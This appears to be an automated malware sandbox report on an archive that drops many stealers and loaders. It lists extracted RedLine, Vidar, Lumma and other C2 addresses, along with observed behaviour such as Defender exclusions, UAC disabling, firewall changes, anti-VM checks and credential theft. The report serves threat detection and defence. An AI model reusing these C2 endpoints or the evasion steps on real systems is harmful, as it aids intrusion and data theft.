Resubmissions
25-04-2024 10:32
240425-mlck1ahh7x 10Analysis
-
max time kernel
1486s -
max time network
1500s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
25-04-2024 10:32
Static task
static1
Behavioral task
behavioral1
Sample
v4_file_x86x64.rar
Resource
win10-20240404-en
General
-
Target
v4_file_x86x64.rar
-
Size
9.9MB
-
MD5
af02e1895fbd9e7cab8179d14dc42f30
-
SHA1
d64e7f92763e28398f10d45119d4c8aa5d8385a7
-
SHA256
52dc03da1118626e67ee6d93d5a9a74b74e41e462cb6b592708411472327c2b9
-
SHA512
7c8939b28aeffed43c2858a5fb16bcccaca077c21d4e8e72a146a182f4d6394821d375861332c25c57af8df083044be09b609ee4374710fc418052dd27b3fffe
-
SSDEEP
196608:3wLcosYt8s0BY+5OrMqbUhJMZJVt14SRhIad1IlN/L8IvY33qnu7qx8:ALcKsYEOAobRlfIC3qu7X
Malware Config
Extracted
redline
LogsDiller Cloud (TG: @logsdillabot)
5.42.65.96:28380
Extracted
vidar
https://steamcommunity.com/profiles/76561199677575543
https://t.me/snsb82
-
user_agent
Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Extracted
tofsee
vanaheim.cn
jotunheim.name
Extracted
socks5systemz
http://ceoefoj.net/search/?q=67e28dd86c0ca77c400cfe4c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa44e8889b5e4fa9281ae978f271ea771795af8e05c645db22f31dfe339426fa11a366c350adb719a9577e55b8603e983a608ffb11c4ee929d32
http://ceoefoj.net/search/?q=67e28dd86c0ca77c400cfe4c7c27d78406abdd88be4b12eab517aa5c96bd86eb97804b865a8bbc896c58e713bc90c91136b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52bee348ee4c2b14a82966836f23d7f210c7ee919a3fcc68911f
Extracted
lumma
https://affordcharmcropwo.shop/api
https://cleartotalfisherwo.shop/api
https://worryfillvolcawoi.shop/api
https://enthusiasimtitleow.shop/api
https://dismissalcylinderhostw.shop/api
https://diskretainvigorousiw.shop/api
https://communicationgenerwo.shop/api
https://pillowbrocccolipe.shop/api
https://productivelookewr.shop/api
https://tolerateilusidjukl.shop/api
https://shatterbreathepsw.shop/api
https://shortsvelventysjo.shop/api
https://incredibleextedwj.shop/api
https://alcojoldwograpciw.shop/api
https://liabilitynighstjsko.shop/api
https://demonstationfukewko.shop/api
Signatures
-
Detect Vidar Stealer 4 IoCs
Processes:
resource yara_rule behavioral1/memory/2540-370-0x0000000000400000-0x000000000064A000-memory.dmp family_vidar_v7 behavioral1/memory/2540-392-0x0000000000400000-0x000000000064A000-memory.dmp family_vidar_v7 behavioral1/memory/4756-387-0x0000000000870000-0x0000000000986000-memory.dmp family_vidar_v7 behavioral1/memory/2540-385-0x0000000000400000-0x000000000064A000-memory.dmp family_vidar_v7 -
Detect ZGRat V1 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\Documents\SimpleAdobe\DOwOUFOet7eMC5vx2MOYygTD.exe family_zgrat_v1 behavioral1/memory/2572-372-0x0000000000D10000-0x00000000010EE000-memory.dmp family_zgrat_v1 -
Glupteba payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/4264-580-0x00000000051A0000-0x0000000005A8B000-memory.dmp family_glupteba behavioral1/memory/4264-582-0x0000000000400000-0x000000000300C000-memory.dmp family_glupteba -
Modifies firewall policy service 2 TTPs 4 IoCs
Processes:
file.exelvwWiigbPRQHkX1WiI1R7O9N.exemCUeMQ8aJkwBepz5YFcMFeyX.exeB96dzdI5a3rTJ0MbwR8vdyO5.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" file.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" lvwWiigbPRQHkX1WiI1R7O9N.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" mCUeMQ8aJkwBepz5YFcMFeyX.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" B96dzdI5a3rTJ0MbwR8vdyO5.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/4564-364-0x0000000000400000-0x0000000000452000-memory.dmp family_redline C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe family_redline -
Socks5Systemz
Socks5Systemz is a botnet written in C++.
-
Processes:
file300un.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" file300un.exe -
Processes:
svchost.exetboJHJHII9Q9oJjVSOI6pAdI.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\SysWOW64\ifzhwuog = "0" svchost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" tboJHJHII9Q9oJjVSOI6pAdI.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" tboJHJHII9Q9oJjVSOI6pAdI.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" tboJHJHII9Q9oJjVSOI6pAdI.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" tboJHJHII9Q9oJjVSOI6pAdI.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" tboJHJHII9Q9oJjVSOI6pAdI.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" tboJHJHII9Q9oJjVSOI6pAdI.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\tboJHJHII9Q9oJjVSOI6pAdI.exe = "0" tboJHJHII9Q9oJjVSOI6pAdI.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 21 IoCs
Processes:
explorta.exeB96dzdI5a3rTJ0MbwR8vdyO5.exefile.exejjuuAXZz7uWvEL2tOnUS.exeRqmEgRdyoc4TnpGWtipi.exechrosha.exeexplorta.exeBmGFwn4X2slFd0x3BwDVZ8IA.exeamert.exeexplorta.exeexplorta.exeTh1PUhyarSTHgHGJTc10cwE0.exeAnDuBYZ639CmLSQ8NUtablTR.exelvwWiigbPRQHkX1WiI1R7O9N.exeexplorta.exeexplorta.exemCUeMQ8aJkwBepz5YFcMFeyX.exeexplorta.exe6c91c65dee.exeexplorta.exeexplorta.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorta.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ B96dzdI5a3rTJ0MbwR8vdyO5.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ file.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ jjuuAXZz7uWvEL2tOnUS.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ RqmEgRdyoc4TnpGWtipi.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ chrosha.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorta.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ BmGFwn4X2slFd0x3BwDVZ8IA.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ amert.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorta.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorta.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Th1PUhyarSTHgHGJTc10cwE0.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ AnDuBYZ639CmLSQ8NUtablTR.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ lvwWiigbPRQHkX1WiI1R7O9N.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorta.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorta.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ mCUeMQ8aJkwBepz5YFcMFeyX.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorta.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 6c91c65dee.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorta.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorta.exe -
Blocklisted process makes network request 12 IoCs
Processes:
HeIaw9JVr_srPOb759oFOk3h.exelvwWiigbPRQHkX1WiI1R7O9N.exepowershell.exerundll32.exerundll32.exerundll32.exeflow pid process 177 4272 HeIaw9JVr_srPOb759oFOk3h.exe 178 3500 lvwWiigbPRQHkX1WiI1R7O9N.exe 179 3500 lvwWiigbPRQHkX1WiI1R7O9N.exe 186 3500 lvwWiigbPRQHkX1WiI1R7O9N.exe 193 3500 lvwWiigbPRQHkX1WiI1R7O9N.exe 150 3500 powershell.exe 154 3500 powershell.exe 284 5136 rundll32.exe 526 7672 rundll32.exe 568 5340 rundll32.exe 526 7672 rundll32.exe 568 5340 rundll32.exe -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exedescription ioc process File created C:\Windows\system32\drivers\pgfilter.sys SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File opened for modification C:\Windows\system32\drivers\pgfilter.sys SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe -
Modifies Windows Firewall 2 TTPs 3 IoCs
Processes:
netsh.exenetsh.exenetsh.exepid process 2328 netsh.exe 4208 netsh.exe 8932 netsh.exe -
Sets service image path in registry 2 TTPs 1 IoCs
Processes:
svchost.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ifzhwuog\ImagePath = "C:\\Windows\\SysWOW64\\ifzhwuog\\sqfngwrn.exe" svchost.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 46 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
mCUeMQ8aJkwBepz5YFcMFeyX.exeexplorta.exeexplorta.exeAnDuBYZ639CmLSQ8NUtablTR.exeInstall.exeexplorta.exe6c91c65dee.exeexplorta.exeInstall.exeexplorta.exefile.exelvwWiigbPRQHkX1WiI1R7O9N.exejjuuAXZz7uWvEL2tOnUS.exeamert.exeTh1PUhyarSTHgHGJTc10cwE0.exeexplorta.exeexplorta.exeBmGFwn4X2slFd0x3BwDVZ8IA.exeInstall.exerundll32.exeexplorta.exeRqmEgRdyoc4TnpGWtipi.exechrosha.exeB96dzdI5a3rTJ0MbwR8vdyO5.exeexplorta.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion mCUeMQ8aJkwBepz5YFcMFeyX.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion AnDuBYZ639CmLSQ8NUtablTR.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6c91c65dee.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion file.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion lvwWiigbPRQHkX1WiI1R7O9N.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion jjuuAXZz7uWvEL2tOnUS.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion amert.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Th1PUhyarSTHgHGJTc10cwE0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion AnDuBYZ639CmLSQ8NUtablTR.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion BmGFwn4X2slFd0x3BwDVZ8IA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion jjuuAXZz7uWvEL2tOnUS.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6c91c65dee.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion BmGFwn4X2slFd0x3BwDVZ8IA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion amert.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion file.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Th1PUhyarSTHgHGJTc10cwE0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion lvwWiigbPRQHkX1WiI1R7O9N.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RqmEgRdyoc4TnpGWtipi.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion chrosha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion chrosha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion B96dzdI5a3rTJ0MbwR8vdyO5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RqmEgRdyoc4TnpGWtipi.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion mCUeMQ8aJkwBepz5YFcMFeyX.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion B96dzdI5a3rTJ0MbwR8vdyO5.exe -
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
xpdQqUQXQWa0iRQg0uFa.exemCUeMQ8aJkwBepz5YFcMFeyX.exevJkRBwz.exeXAafaZk.exeB96dzdI5a3rTJ0MbwR8vdyO5.exefile.exelvwWiigbPRQHkX1WiI1R7O9N.exeCCtCNtF.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\International\Geo\Nation xpdQqUQXQWa0iRQg0uFa.exe Key value queried \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\International\Geo\Nation mCUeMQ8aJkwBepz5YFcMFeyX.exe Key value queried \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\International\Geo\Nation vJkRBwz.exe Key value queried \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\International\Geo\Nation XAafaZk.exe Key value queried \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\International\Geo\Nation B96dzdI5a3rTJ0MbwR8vdyO5.exe Key value queried \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\International\Geo\Nation file.exe Key value queried \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\International\Geo\Nation lvwWiigbPRQHkX1WiI1R7O9N.exe Key value queried \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\International\Geo\Nation CCtCNtF.exe -
Drops startup file 2 IoCs
Processes:
Hst3lrLxOp00o64vOZXF5TK2.exeAnDuBYZ639CmLSQ8NUtablTR.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk Hst3lrLxOp00o64vOZXF5TK2.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS131.lnk AnDuBYZ639CmLSQ8NUtablTR.exe -
Executes dropped EXE 64 IoCs
Processes:
file.exew7u18e_0lbq7_yG06w2Nbj5d.exeH7vqBgvStVLgPDsFhYslN7In.exeluhXBiuEvI6m3KxAsSfTpgok.exeHeIaw9JVr_srPOb759oFOk3h.exeAnDuBYZ639CmLSQ8NUtablTR.exetboJHJHII9Q9oJjVSOI6pAdI.exemps245jJroRl14O6Z4MCwgJe.exeHst3lrLxOp00o64vOZXF5TK2.exelvwWiigbPRQHkX1WiI1R7O9N.exeDOwOUFOet7eMC5vx2MOYygTD.exeYeIXGSxWKaTAiDgamD7WXkA9.exepGQrSVf4_mIUyUtVNqNoton6.exezlbyhhvqluAa2YWd57tl7eT_.exeABdncqG0qcBNNomxh8SNa7uR.exeH7vqBgvStVLgPDsFhYslN7In.tmpInstall.exempcvideostar.exempcvideostar.exeInstall.exeu10k.0.exesqfngwrn.exerun.exedckuybanmlgp.exetboJHJHII9Q9oJjVSOI6pAdI.exegZfYynT.execsrss.exeWFAhAmhGq1gP_X_914kc.exeCCtCNtF.exeinjector.exewPomemXLiK3rq2QEvqS91crJ.exewPomemXLiK3rq2QEvqS91crJ.exewindefender.exewindefender.exejjuuAXZz7uWvEL2tOnUS.exexpdQqUQXQWa0iRQg0uFa.exeexplorta.exeRqmEgRdyoc4TnpGWtipi.exeamert.exe41759ac5d4.exe6c91c65dee.exeexplorta.exechrosha.exeswiiiii.exealexxxxxxxx.exekeks.exetrf.exegold.exeNewB.exejok.exeswiiii.exefile300un.exeinstall.execoqzjkHJEbpW9q55EOXHJsKt.exeGameService.exeGameService.exe0Nhea7WWQs8EX8ArZhcVpAHV.exeGameService.exeGameService.exeN6wB3wEBbCcQjlZT4NZcejMm.exeRGUyQ5HOPZjJrAUGf90W96jQ.exeu5to.0.exeInstall.exeGameServerClient.exepid process 2432 file.exe 3176 w7u18e_0lbq7_yG06w2Nbj5d.exe 4676 H7vqBgvStVLgPDsFhYslN7In.exe 2708 luhXBiuEvI6m3KxAsSfTpgok.exe 4272 HeIaw9JVr_srPOb759oFOk3h.exe 4336 AnDuBYZ639CmLSQ8NUtablTR.exe 4264 tboJHJHII9Q9oJjVSOI6pAdI.exe 1316 mps245jJroRl14O6Z4MCwgJe.exe 2732 Hst3lrLxOp00o64vOZXF5TK2.exe 3500 lvwWiigbPRQHkX1WiI1R7O9N.exe 2572 DOwOUFOet7eMC5vx2MOYygTD.exe 2676 YeIXGSxWKaTAiDgamD7WXkA9.exe 2004 pGQrSVf4_mIUyUtVNqNoton6.exe 4756 zlbyhhvqluAa2YWd57tl7eT_.exe 1172 ABdncqG0qcBNNomxh8SNa7uR.exe 2092 H7vqBgvStVLgPDsFhYslN7In.tmp 2556 Install.exe 4440 mpcvideostar.exe 3444 mpcvideostar.exe 4116 Install.exe 660 u10k.0.exe 2412 sqfngwrn.exe 192 run.exe 5596 dckuybanmlgp.exe 3872 tboJHJHII9Q9oJjVSOI6pAdI.exe 6060 gZfYynT.exe 4164 csrss.exe 4812 WFAhAmhGq1gP_X_914kc.exe 5340 CCtCNtF.exe 3108 injector.exe 5508 wPomemXLiK3rq2QEvqS91crJ.exe 5816 wPomemXLiK3rq2QEvqS91crJ.exe 5844 windefender.exe 1724 windefender.exe 1728 jjuuAXZz7uWvEL2tOnUS.exe 5388 xpdQqUQXQWa0iRQg0uFa.exe 6060 explorta.exe 5752 RqmEgRdyoc4TnpGWtipi.exe 4332 amert.exe 4316 41759ac5d4.exe 6216 6c91c65dee.exe 3172 explorta.exe 1036 chrosha.exe 5288 swiiiii.exe 5668 alexxxxxxxx.exe 6840 keks.exe 6708 trf.exe 3008 gold.exe 6552 NewB.exe 6896 jok.exe 7272 swiiii.exe 7476 file300un.exe 8084 install.exe 7548 coqzjkHJEbpW9q55EOXHJsKt.exe 7628 GameService.exe 7988 GameService.exe 6264 0Nhea7WWQs8EX8ArZhcVpAHV.exe 7280 GameService.exe 7348 GameService.exe 7540 N6wB3wEBbCcQjlZT4NZcejMm.exe 7692 RGUyQ5HOPZjJrAUGf90W96jQ.exe 6648 u5to.0.exe 8160 Install.exe 8020 GameServerClient.exe -
Identifies Wine through registry keys 2 TTPs 14 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
jjuuAXZz7uWvEL2tOnUS.exeexplorta.exechrosha.exeexplorta.exeRqmEgRdyoc4TnpGWtipi.exeamert.exeexplorta.exeexplorta.exe6c91c65dee.exeexplorta.exeexplorta.exeexplorta.exeexplorta.exeexplorta.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Wine jjuuAXZz7uWvEL2tOnUS.exe Key opened \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Wine explorta.exe Key opened \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Wine chrosha.exe Key opened \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Wine explorta.exe Key opened \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Wine RqmEgRdyoc4TnpGWtipi.exe Key opened \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Wine amert.exe Key opened \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Wine explorta.exe Key opened \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Wine explorta.exe Key opened \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Wine 6c91c65dee.exe Key opened \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Wine explorta.exe Key opened \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Wine explorta.exe Key opened \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Wine explorta.exe Key opened \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Wine explorta.exe Key opened \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Wine explorta.exe -
Loads dropped DLL 44 IoCs
Processes:
H7vqBgvStVLgPDsFhYslN7In.tmprun.exeDOwOUFOet7eMC5vx2MOYygTD.exerundll32.exetaskmgr.exerundll32.exerundll32.exerundll32.exeRegAsm.exerun.exe7MIpvZeCZgl5ZPeAuQtK9vkn.exe7MIpvZeCZgl5ZPeAuQtK9vkn.exe7MIpvZeCZgl5ZPeAuQtK9vkn.exe7MIpvZeCZgl5ZPeAuQtK9vkn.exe7MIpvZeCZgl5ZPeAuQtK9vkn.exeassistant_installer.exeassistant_installer.exerun.exepoH7LiwSXsBgm1pfVmOtFOU9.exepoH7LiwSXsBgm1pfVmOtFOU9.exepoH7LiwSXsBgm1pfVmOtFOU9.exenfregdrv.exeincinerator.exeiolo.exeioloTrayApp.exeregsvr32.exeactivebridge.exeioloTrayApp.exerBdWuA6zmGPcTnlvCUeUt5hz.tmppid process 2092 H7vqBgvStVLgPDsFhYslN7In.tmp 2092 H7vqBgvStVLgPDsFhYslN7In.tmp 2092 H7vqBgvStVLgPDsFhYslN7In.tmp 192 run.exe 2572 DOwOUFOet7eMC5vx2MOYygTD.exe 5136 rundll32.exe 2484 taskmgr.exe 7648 rundll32.exe 7672 rundll32.exe 5340 rundll32.exe 7352 RegAsm.exe 7352 RegAsm.exe 7332 run.exe 6776 7MIpvZeCZgl5ZPeAuQtK9vkn.exe 8120 7MIpvZeCZgl5ZPeAuQtK9vkn.exe 7232 7MIpvZeCZgl5ZPeAuQtK9vkn.exe 8060 7MIpvZeCZgl5ZPeAuQtK9vkn.exe 8024 7MIpvZeCZgl5ZPeAuQtK9vkn.exe 4412 assistant_installer.exe 4412 assistant_installer.exe 1408 assistant_installer.exe 1408 assistant_installer.exe 6836 run.exe 4992 poH7LiwSXsBgm1pfVmOtFOU9.exe 7336 poH7LiwSXsBgm1pfVmOtFOU9.exe 8028 poH7LiwSXsBgm1pfVmOtFOU9.exe 7588 nfregdrv.exe 8544 incinerator.exe 7424 iolo.exe 7424 iolo.exe 7424 iolo.exe 6344 ioloTrayApp.exe 6344 ioloTrayApp.exe 6344 ioloTrayApp.exe 6944 regsvr32.exe 7064 activebridge.exe 7064 activebridge.exe 7064 activebridge.exe 3172 ioloTrayApp.exe 3172 ioloTrayApp.exe 3172 ioloTrayApp.exe 7092 rBdWuA6zmGPcTnlvCUeUt5hz.tmp 7092 rBdWuA6zmGPcTnlvCUeUt5hz.tmp 7092 rBdWuA6zmGPcTnlvCUeUt5hz.tmp -
Modifies system executable filetype association 2 TTPs 2 IoCs
Processes:
regsvr32.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\Incinerator regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\Incinerator\ = "{E8215BEA-3290-4C73-964B-75502B9B41B2}" regsvr32.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Registers COM server for autorun 1 TTPs 17 IoCs
Processes:
regsvr32.exeincinerator.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D90EF6CF-32CB-476D-B57C-1A71E58E8301}\InprocServer32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E8215BEA-3290-4C73-964B-75502B9B41B2}\InProcServer32\ThreadingModel = "Apartment" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F148A78C-91B1-45DC-83A9-291108F3B245}\InProcServer32\ = "C:\\Program Files\\iolo technologies\\System Mechanic\\Incinerator.dll" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9081C77F-9FAF-4551-A878-10A4249CD1FA}\InProcServer32\ThreadingModel = "Apartment" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E8215BEA-3290-4C73-964B-75502B9B41B2}\InProcServer32 regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F148A78C-91B1-45DC-83A9-291108F3B245}\InProcServer32 regsvr32.exe 